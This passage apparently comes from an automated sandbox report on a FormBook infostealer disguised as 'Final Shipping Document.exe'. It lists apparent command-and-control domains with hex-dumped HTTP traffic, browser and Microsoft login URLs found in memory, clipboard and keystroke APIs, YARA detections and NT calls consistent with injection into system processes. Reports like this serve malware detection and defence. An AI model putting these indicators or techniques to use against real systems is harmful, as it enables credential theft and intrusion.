22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:53 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:58 GMTServer: ApacheContent-Length: 269Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 61 77 63 66 7a 63 71 6c 39 74 63 76 6a 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.xawcfzcql9tcvj.shop Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:48:01 GMTServer: ApacheContent-Length: 269Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 61 77 63 66 7a 63 71 6c 39 74 63 76 6a 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.xawcfzcql9tcvj.shop Port 80</address></body></html>
            Source: gpupdate.exe, 00000005.00000002.3891568008.0000000005D5A000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.00000000039BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.pqnqxn.xyz
            Source: QnAcfZuONg.exe, 00000007.00000002.3892567751.00000000055B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xawcfzcql9tcvj.shop
            Source: QnAcfZuONg.exe, 00000007.00000002.3892567751.00000000055B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xawcfzcql9tcvj.shop/jug9/
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: gpupdate.exe, 00000005.00000002.3891568008.000000000607E000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000003CDE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: gpupdate.exe, 00000005.00000002.3891568008.0000000006534000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000004194000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: gpupdate.exe, 00000005.00000003.2642977776.0000000008194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: gpupdate.exe, 00000005.00000002.3891568008.0000000006210000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000003E70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C1EAFF
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C1ED6A
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C1EAFF
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00C0AA57
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C39576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: Final Shipping Document.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Final Shipping Document.exe, 00000000.00000000.2024915795.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f5b702e8-6
            Source: Final Shipping Document.exe, 00000000.00000000.2024915795.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8442c1ab-5
            Source: Final Shipping Document.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fdb0c75a-9
            Source: Final Shipping Document.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0451d695-3
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Final Shipping Document.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C043 NtClose,2_2_0042C043
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B60 NtClose,LdrInitializeThunk,2_2_03372B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03372DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03372C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,2_2_033735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374340 NtSetContextThread,2_2_03374340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374650 NtSuspendThread,2_2_03374650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BA0 NtEnumerateValueKey,2_2_03372BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B80 NtQueryInformationFile,2_2_03372B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BF0 NtAllocateVirtualMemory,2_2_03372BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BE0 NtQueryValueKey,2_2_03372BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AB0 NtWaitForSingleObject,2_2_03372AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AF0 NtWriteFile,2_2_03372AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AD0 NtReadFile,2_2_03372AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F30 NtCreateSection,2_2_03372F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F60 NtCreateProcessEx,2_2_03372F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FB0 NtResumeThread,2_2_03372FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FA0 NtQuerySection,2_2_03372FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F90 NtProtectVirtualMemory,2_2_03372F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FE0 NtCreateFile,2_2_03372FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E30 NtWriteVirtualMemory,2_2_03372E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EA0 NtAdjustPrivilegesToken,2_2_03372EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E80 NtReadVirtualMemory,2_2_03372E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EE0 NtQueueApcThread,2_2_03372EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D30 NtUnmapViewOfSection,2_2_03372D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D10 NtMapViewOfSection,2_2_03372D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D00 NtSetInformationFile,2_2_03372D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DB0 NtEnumerateKey,2_2_03372DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DD0 NtDelayExecution,2_2_03372DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C00 NtQueryInformationProcess,2_2_03372C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C60 NtCreateKey,2_2_03372C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CA0 NtQueryInformationToken,2_2_03372CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CF0 NtOpenProcess,2_2_03372CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CC0 NtQueryVirtualMemory,2_2_03372CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373010 NtOpenDirectoryObject,2_2_03373010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373090 NtSetValueKey,2_2_03373090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033739B0 NtGetContextThread,2_2_033739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D10 NtOpenProcessToken,2_2_03373D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D70 NtOpenThread,2_2_03373D70
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F04650 NtSuspendThread,LdrInitializeThunk,5_2_04F04650
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F04340 NtSetContextThread,LdrInitializeThunk,5_2_04F04340
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04F02CA0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04F02C70
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02C60 NtCreateKey,LdrInitializeThunk,5_2_04F02C60
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04F02DF0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02DD0 NtDelayExecution,LdrInitializeThunk,5_2_04F02DD0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04F02D30
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04F02D10
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04F02EE0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04F02E80
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02FE0 NtCreateFile,LdrInitializeThunk,5_2_04F02FE0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02FB0 NtResumeThread,LdrInitializeThunk,5_2_04F02FB0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02F30 NtCreateSection,LdrInitializeThunk,5_2_04F02F30
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02AF0 NtWriteFile,LdrInitializeThunk,5_2_04F02AF0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02AD0 NtReadFile,LdrInitializeThunk,5_2_04F02AD0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04F02BF0
